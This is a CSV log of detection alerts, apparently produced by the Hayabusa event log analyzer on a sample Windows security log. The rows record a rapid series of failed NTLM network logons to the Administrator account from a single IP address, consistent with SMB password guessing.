2016-09-20 01:50:38.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H1f6szOactEp5ntF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Loe5RkT9Ki0Aw2Lv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJdVtE7dNSoyM3LI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QlAtU1mIO7m5DnuP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.132 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wAK2rh94yKwiH2Nw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AuqsvmUbPlpWFBRZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BShEB6VnXkOxwtFB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AjAc5QMvpTBsDziO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fwwp5CD20dR8QrIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.329 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tL6GzVzndZL7DZMN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.371 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zK5IpESvDA2DexwL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.404 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qvTyabCyGaxscOrN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FW8VghddPwP5C6dO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xGZuyZ0LErZ3Sgty | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.515 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bT1xrvfndr5R8Vg3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H6RFTZVJE9remzqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.599 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pzjwzORvTwuBPLEs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.644 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UMjSFfZ88BV2sT1F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.681 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SnpCLI2EJZRhr3vz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ztEU2m9SwbqgSdVY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MHO1X0zwmoWotcM4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ck429g2Cs4siVVq4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.835 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9txH9zA3oY885iTi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: alIIEzE2rTrNtOtr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ww4BXLwhaNxOttgo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.977 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GPdz2pjDocMWqctT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QOm1i2a20IDNmIu4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ukSrSu516dHlHQ94 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: grdERCipFl1FMB1o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmpuUsIRbp57KCRD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VWLuqrOQSQuqcwUr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eEASOf84AX8ow4vf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.254 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IcgNTGlESh6FytEY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.302 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OeVo7D3oBsdUMHfj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mLqSB2yGMksaBgUS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y7qRzzpL2YhfIGSD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvE5tMw3MjDhA0Fe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.488 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aXuNgOkIzvKIuJki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q8vPHEXrxVpUyKZq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.581 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vk7sh6VM7AZQv2in | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.627 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jurt5hAg90y1VWdT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MlrPbTbJRTxFakiv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.700 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RQ5cWmYL8weCCRT0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k0v2Emgn7BD1STZl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MJppWxAiNJ4D0s2U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.853 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zHVcJEec3y6v9gIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 68RKE5dS8X5Px2gR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.010 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Np8mTqhr7QasXk1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MhpDNDIPVyRlfej8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.118 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qZtmxGeLj25VSUcm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.166 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SPN8w8WghBYzChZc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.205 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 36hmbCuKxF9Dt4vR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TALpRirdvB9a8y6M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wvEvwFeXGOgycZvA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ppxeOgZNua2Ieuc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.387 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n4U5XdQu1YtSat7J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.438 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MN0OfYE6vPgqyyZN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.494 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmfCPIdiTH9gG2qZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.540 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UtcHAxmfDL9C9uZa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TX62kMSJqq0Lv8o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hA20OdabfW5DMphV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.665 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ex5Awm2zaVhvAMTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I72BOMPQHyyP374g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.790 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4al5pUa4mKfbL734 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.830 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UNHH8ESWZ4Rx6K93 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ay3XdxRFXXaD4Ib | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1PgyG7spUL5glkVh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6D6PVnrIODwtcIXN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.999 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cRZgqmQbL3l7KTke | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.032 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HYGKv2l0s9XZnqkl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.078 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wX2R08dxiEcRNzcM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HcN791fdSHwaWuBC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CRObbkQsykQma2Tn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.194 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v4UvU7VglbA2p0Z9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
